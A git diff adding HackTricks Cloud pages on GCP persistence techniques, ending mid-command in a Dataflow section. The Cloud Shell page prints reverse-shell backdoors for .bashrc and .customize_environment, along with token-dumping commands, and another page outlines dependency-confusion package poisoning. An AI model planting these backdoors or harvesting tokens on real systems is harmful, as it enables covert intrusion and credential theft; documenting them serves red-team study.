+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/gcp-security/gcp-persistence/gcp-artifact-registry-persistence.md b/pentesting-cloud/gcp-security/gcp-persistence/gcp-artifact-registry-persistence.md
new file mode 100644
index 0000000000..2347089289
--- /dev/null
+++ b/pentesting-cloud/gcp-security/gcp-persistence/gcp-artifact-registry-persistence.md
@@ -0,0 +1,67 @@
+# GCP - Artifact Registry Persistence
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Artifact Registry
+
+For more information about Artifact Registry check:
+
+{% content-ref url="../gcp-services/gcp-artifact-registry-enum.md" %}
+[gcp-artifact-registry-enum.md](../gcp-services/gcp-artifact-registry-enum.md)
+{% endcontent-ref %}
+
+### Dependency Confusion
+
+* What happens if a **remote and a standard** repositories **are mixed in a virtual** one and a package exists in both?
+  * The one with the **highest priority set in the virtual repository** is used
+  * If the **priority is the same**:
+    * If the **version** is the **same**, the **policy name alphabetically** first in the virtual repository is used
+    * If not, the **highest version** is used
+
+{% hint style="danger" %}
+Therefore, it's possible to **abuse a highest version (dependency confusion)** in a public package registry if the remote repository has a higher or same priority
+{% endhint %}
+
+This technique can be useful for **persistence** and **unauthenticated access** as to abuse it it just require to **know a library name** stored in Artifact Registry and **create that same library in the public repository (PyPi for python for example)** with a higher version.
+
+For persistence these are the steps you need to follow:
+
+* **Requirements**: A **virtual repository** must **exist** and be used, an **internal package** with a **name** that doesn't exist in the **public repository** must be used.
+* Create a remote repository if it doesn't exist
+* Add the remote repository to the virtual repository
+* Edit the policies of the virtual registry to give a higher priority (or same) to the remote repository.\
+  Run something like:
+  * [gcloud artifacts repositories update --upstream-policy-file ...](https://cloud.google.com/sdk/gcloud/reference/artifacts/repositories/update#--upstream-policy-file)
+* Download the legit package, add your malicious code and register it in the public repository with the same version. Every time a developer installs it, he will install yours!
+
+For more information about dependency confusion check:
+
+{% embed url="https://book.hacktricks.xyz/pentesting-web/dependency-confusion" %}
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/gcp-security/gcp-persistence/gcp-bigquery-persistence.md b/pentesting-cloud/gcp-security/gcp-persistence/gcp-bigquery-persistence.md
new file mode 100644
index 0000000000..6aa03016c1
--- /dev/null
+++ b/pentesting-cloud/gcp-security/gcp-persistence/gcp-bigquery-persistence.md
@@ -0,0 +1,47 @@
+# GCP - BigQuery Persistence
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## BigQuery
+
+For more information about BigQuery check:
+
+{% content-ref url="../gcp-services/gcp-bigquery-enum.md" %}
+[gcp-bigquery-enum.md](../gcp-services/gcp-bigquery-enum.md)
+{% endcontent-ref %}
+
+### Grant further access
+
+Grant further access over datasets, tables, rows and columns to compromised users or external users. Check the privileges needed and how to do this in the page:
+
+{% content-ref url="../gcp-privilege-escalation/gcp-bigquery-privesc.md" %}
+[gcp-bigquery-privesc.md](../gcp-privilege-escalation/gcp-bigquery-privesc.md)
+{% endcontent-ref %}
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-functions-persistence.md b/pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-functions-persistence.md
new file mode 100644
index 0000000000..193e168de1
--- /dev/null
+++ b/pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-functions-persistence.md
@@ -0,0 +1,45 @@
+# GCP - Cloud Functions Persistence
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Cloud Functions
+
+For more info about Cloud Functions check:
+
+{% content-ref url="../gcp-services/gcp-cloud-functions-enum.md" %}
+[gcp-cloud-functions-enum.md](../gcp-services/gcp-cloud-functions-enum.md)
+{% endcontent-ref %}
+
+### Persistence Techniques
+
+* **Modify the code** of the Cloud Function, even just the `requirements.txt`
+* **Allow anyone** to call a vulnerable Cloud Function or a backdoor one
+* **Trigger** a Cloud Function when something happens to infect something
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-run-persistence.md b/pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-run-persistence.md
new file mode 100644
index 0000000000..909237bddc
--- /dev/null
+++ b/pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-run-persistence.md
@@ -0,0 +1,51 @@
+# GCP - Cloud Run Persistence
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Cloud Run
+
+For more information about Cloud Run check:
+
+{% content-ref url="../gcp-services/gcp-cloud-run-enum.md" %}
+[gcp-cloud-run-enum.md](../gcp-services/gcp-cloud-run-enum.md)
+{% endcontent-ref %}
+
+### Backdoored Revision
+
+Create a new backdoored revision of a Run Service and split some traffic to it.
+
+### Publicly Accessible Service
+
+Make a Service publicly accessible
+
+### Backdoored Service or Job
+
+Create a backdoored Service or Job
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-shell-persistence.md b/pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-shell-persistence.md
new file mode 100644
index 0000000000..5f79602853
--- /dev/null
+++ b/pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-shell-persistence.md
@@ -0,0 +1,98 @@
+# GCP - Cloud Shell Persistence
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Cloud Shell
+
+For more information check:
+
+{% content-ref url="../gcp-services/gcp-cloud-shell-enum.md" %}
+[gcp-cloud-shell-enum.md](../gcp-services/gcp-cloud-shell-enum.md)
+{% endcontent-ref %}
+
+### Persistent Backdoor
+
+[**Google Cloud Shell**](https://cloud.google.com/shell/) provides you with command-line access to your cloud resources directly from your browser without any associated cost.
+
+You can access Google's Cloud Shell from the **web console** or running **`gcloud cloud-shell ssh`**.
+
+This console has some interesting capabilities for attackers:
+
+1. **Any Google user with access to Google Cloud** has access to a fully authenticated Cloud Shell instance (Service Accounts can, even being Owners of the org).
+2. Said instance will **maintain its home directory for at least 120 days** if no activity happens.
+3. There is **no capabilities for an organisation to monitor** the activity of that instance.
+
+This basically means that an attacker may put a backdoor in the home directory of the user and as long as the user connects to the GC Shell every 120days at least, the backdoor will survive and the attacker will get a shell every time it's run just by doing:
+
+{% code overflow="wrap" %}
+```bash
+echo '(nohup /usr/bin/env -i /bin/bash 2>/dev/null -norc -noprofile >& /dev/tcp/'$CCSERVER'/443 0>&1 &)' >> $HOME/.bashrc
+```
+{% endcode %}
+
+There is another file in the home folder called **`.customize_environment`** that, if exists, is going to be **executed everytime** the user access the **cloud shell** (like in the previous technique). Just insert the previous backdoor or one like the following to maintain persistence as long as the user uses "frequently" the cloud shell:
+
+```bash
+#!/bin/sh
+apt-get install netcat -y
+nc <LISTENER-ADDR> 443 -e /bin/bash
+```
+
+{% hint style="warning" %}
+It is important to note that the **first time an action requiring authentication is performed**, a pop-up authorization window appears in the user's browser. This window must be accepted before the command can run. If an unexpected pop-up appears, it could raise suspicion and potentially compromise the persistence method being used.
+{% endhint %}
+
+This is the pop-up from executing `gcloud projects list` from the cloud shell (as attacker) viewed in the browsers user session:
+
+<figure><img src="../../../.gitbook/assets/image (10).png" alt=""><figcaption></figcaption></figure>
+
+However, if the user has actively used the cloudshell, the pop-up won't appear and you can **gather tokens of the user with**:
+
+```bash
+gcloud auth print-access-token
+gcloud auth application-default print-access-token
+```
+
+#### How the SSH connection is stablished
+
+Basically, these 3 API calls are used:
+
+* [https://content-cloudshell.googleapis.com/v1/users/me/environments/default:addPublicKey](https://content-cloudshell.googleapis.com/v1/users/me/environments/default:addPublicKey) \[POST] (will make you add your public key you created locally)
+* [https://content-cloudshell.googleapis.com/v1/users/me/environments/default:start](https://content-cloudshell.googleapis.com/v1/users/me/environments/default:start) \[POST] (will make you start the instance)
+* [https://content-cloudshell.googleapis.com/v1/users/me/environments/default](https://content-cloudshell.googleapis.com/v1/users/me/environments/default) \[GET] (will tell you the ip of the google cloud shell)
+
+But you can find further information in [https://github.com/FrancescoDiSalesGithub/Google-cloud-shell-hacking?tab=readme-ov-file#ssh-on-the-google-cloud-shell-using-the-private-key](https://github.com/FrancescoDiSalesGithub/Google-cloud-shell-hacking?tab=readme-ov-file#ssh-on-the-google-cloud-shell-using-the-private-key)
+
+## References
+
+* [https://89berner.medium.com/persistant-gcp-backdoors-with-googles-cloud-shell-2f75c83096ec](https://89berner.medium.com/persistant-gcp-backdoors-with-googles-cloud-shell-2f75c83096ec)
+* [https://github.com/FrancescoDiSalesGithub/Google-cloud-shell-hacking?tab=readme-ov-file#ssh-on-the-google-cloud-shell-using-the-private-key](https://github.com/FrancescoDiSalesGithub/Google-cloud-shell-hacking?tab=readme-ov-file#ssh-on-the-google-cloud-shell-using-the-private-key)
+* [https://securityintelligence.com/posts/attacker-achieve-persistence-google-cloud-platform-cloud-shell/](https://securityintelligence.com/posts/attacker-achieve-persistence-google-cloud-platform-cloud-shell/)
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-sql-persistence.md b/pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-sql-persistence.md
new file mode 100644
index 0000000000..1cfe2f833a
--- /dev/null
+++ b/pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-sql-persistence.md
@@ -0,0 +1,64 @@
+# GCP - Cloud SQL Persistence
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Cloud SQL
+
+For more information about Cloud SQL check:
+
+{% content-ref url="../gcp-services/gcp-cloud-sql-enum.md" %}
+[gcp-cloud-sql-enum.md](../gcp-services/gcp-cloud-sql-enum.md)
+{% endcontent-ref %}
+
+### Expose the database and whitelist your IP address
+
+A database only accessible from an internal VPC can be exposed externally and your IP address can be whitelisted so you can access it.\
+For more information check the technique in:
+
+{% content-ref url="../gcp-post-exploitation/gcp-cloud-sql-post-exploitation.md" %}
+[gcp-cloud-sql-post-exploitation.md](../gcp-post-exploitation/gcp-cloud-sql-post-exploitation.md)
+{% endcontent-ref %}
+
+### Create a new user / Update users password / Get password of a user
+
+To connect to a database you **just need access to the port** exposed by the database and a **username** and **password**. With e**nough privileges** you could **create a new user** or **update** an existing user **password**.\
+Another option would be to **brute force the password of an user** by trying several password or by accessing the **hashed** password of the user inside the database (if possible) and cracking it.\
+Remember that **it's possible to list the users of a database** using GCP API.
+
+{% hint style="info" %}
+You can create/update users using GCP API or from inside the databae if you have enough permissions.
+{% endhint %}
+
+For more information check the technique in:
+
+{% content-ref url="../gcp-post-exploitation/gcp-cloud-sql-post-exploitation.md" %}
+[gcp-cloud-sql-post-exploitation.md](../gcp-post-exploitation/gcp-cloud-sql-post-exploitation.md)
+{% endcontent-ref %}
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/gcp-security/gcp-persistence/gcp-compute-persistence.md b/pentesting-cloud/gcp-security/gcp-persistence/gcp-compute-persistence.md
new file mode 100644
index 0000000000..06a63c4e96
--- /dev/null
+++ b/pentesting-cloud/gcp-security/gcp-persistence/gcp-compute-persistence.md
@@ -0,0 +1,45 @@
+# GCP - Compute Persistence
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Compute
+
+For more informatoin about Compute and VPC (Networking) check:
+
+{% content-ref url="../gcp-services/gcp-compute-instances-enum/" %}
+[gcp-compute-instances-enum](../gcp-services/gcp-compute-instances-enum/)
+{% endcontent-ref %}
+
+### Persistence abusing Instances & backups
+
+* Backdoor existing VMs
+* Backdoor disk images and snapshots creating new versions
+* Create new accessible instance with a privileged SA
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/gcp-security/gcp-persistence/gcp-dataflow-persistence.md b/pentesting-cloud/gcp-security/gcp-persistence/gcp-dataflow-persistence.md
new file mode 100644
index 0000000000..13153856cb
--- /dev/null
+++ b/pentesting-cloud/gcp-security/gcp-persistence/gcp-dataflow-persistence.md
@@ -0,0 +1,79 @@
+# GCP - Dataflow Persistence
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Dataflow
+
+### Invisible persistence in built container
+
+Following the [**tutorial from the documentation**](https://cloud.google.com/dataflow/docs/guides/templates/using-flex-templates) you can create a new (e.g. python) flex template:
+
+```bash
+git clone https://github.com/GoogleCloudPlatform/python-docs-samples.git
+cd python-docs-samples/dataflow/flex-templates/getting_started
+
+# Create repository where dockerfiles and code is going to be stored
+export REPOSITORY=flex-example-python
+gcloud storage buckets create gs://$REPOSITORY
+
+# Create artifact storage
+export NAME_ARTIFACT=flex-example-python
+gcloud artifacts repositories create $NAME_ARTIFACT \
+ --repository-format=docker \
+ --location=us-central1
+gcloud auth configure-docker us-central1-docker.pkg.dev
+
+# Create template
+export NAME_TEMPLATE=flex-template
+gcloud dataflow $NAME_TEMPLATE build gs://$REPOSITORY/getting_started-py.json \
+ --image-gcr-path "us-central1-docker.pkg.dev/gcp-labs-35jfenjy/$NAME_ARTIFACT/getting-started-python:latest" \
+ --sdk-language "PYTHON" \
+ --flex-template-base-image "PYTHON3" \
+ --metadata-file "metadata.json" \
+ --py-path "." \
+ --env "FLEX_TEMPLATE_PYTHON_PY_FILE=getting_started.py" \
+ --env "FLEX_TEMPLATE_PYTHON_REQUIREMENTS_FILE=requirements.txt" \
+ --env "PYTHONWARNINGS=all:0:antigravity.x:0:0" \
